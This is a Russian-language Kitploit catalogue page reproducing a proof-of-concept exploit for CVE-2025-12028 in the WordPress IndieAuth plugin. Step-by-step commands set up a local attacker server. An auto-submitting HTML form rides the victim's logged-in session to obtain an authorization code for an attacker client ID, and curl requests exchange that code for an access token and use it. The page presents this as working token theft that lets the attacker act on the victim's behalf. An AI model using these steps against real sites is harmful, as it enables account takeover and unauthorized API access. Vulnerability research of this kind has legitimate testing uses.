Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-12028 — Эксплойт-концепт для CVE-2025-12028, демонстрирующий кражу OAuth-токена на основе CSRF в плагине WordPress IndieAuth, позволяющую несанкционированный доступ к API с украденными учетными данными. | Kitploit
Инструменты/GitHubGitHub/jfriedli/cve-2025-12028
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеАутентификация
GitHubjfriedli/cve-2025-12028

CVE-2025-12028

Эксплойт-концепт для CVE-2025-12028, демонстрирующий кражу OAuth-токена на основе CSRF в плагине WordPress IndieAuth, позволяющую несанкционированный доступ к API с украденными учетными данными.

Репозиторий
15 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

1) Запустите простой HTTP-сервер для размещения страницы proof-of-concept

root@kitploit:~
mkdir -p /tmp/attacker && cd /tmp/attacker
php -S 127.0.0.1:8000

2) Создайте файл /tmp/attacker/poc.html со следующим содержимым

root@kitploit:~
<!doctype html>
<html>
  <body>
    <form id="x" method="post" action="http://localhost/wordpress/wp-login.php?action=indieauth">
      <input name="client_id" value="http://attacker.local/app">
      <input name="redirect_uri" value="http://127.0.0.1:8000/cb">
      <input name="state" value="csrf-12345">
      <input name="response_type" value="code">
      <input name="scope[]" value="create">
      <input name="scope[]" value="update">
      <input name="scope[]" value="delete">
    </form>
    <script>
      document.getElementById('x').submit();
    </script>
  </body>
</html>

3) Запустите PoC в авторизованной сессии браузера

Будучи авторизованным на:

root@kitploit:~
http://localhost/wordpress

Откройте:

root@kitploit:~
http://127.0.0.1:8000/poc.html

в той же сессии браузера.


4) Наблюдайте перенаправление авторизации

Браузер:

  • Отправит POST-запрос на конечную точку IndieAuth с куками жертвы
  • Получит код авторизации
  • Перенаправит на:
root@kitploit:~
http://127.0.0.1:8000/cb?code=...&state=csrf-12345

5) Обменяйте код на токен доступа

root@kitploit:~
curl -sX POST "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -d "grant_type=authorization_code" \
  -d "code=PASTE_CODE_FROM_STEP_4" \
  -d "client_id=http://attacker.local/app" \
  -d "redirect_uri=http://127.0.0.1:8000/cb"

6) Просмотрите ответ с токеном

Ответ в формате JSON будет содержать такие поля, как:

  • access_token
  • scope
  • me
  • (возможно) refresh_token

Теперь этот токен можно использовать для действий от имени жертвы в рамках предоставленных областей (scopes).


7) Проверьте токен

root@kitploit:~
TOKEN="PASTE_ACCESS_TOKEN"

curl -s "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -H "Authorization: Bearer $TOKEN"
Скачать инструмент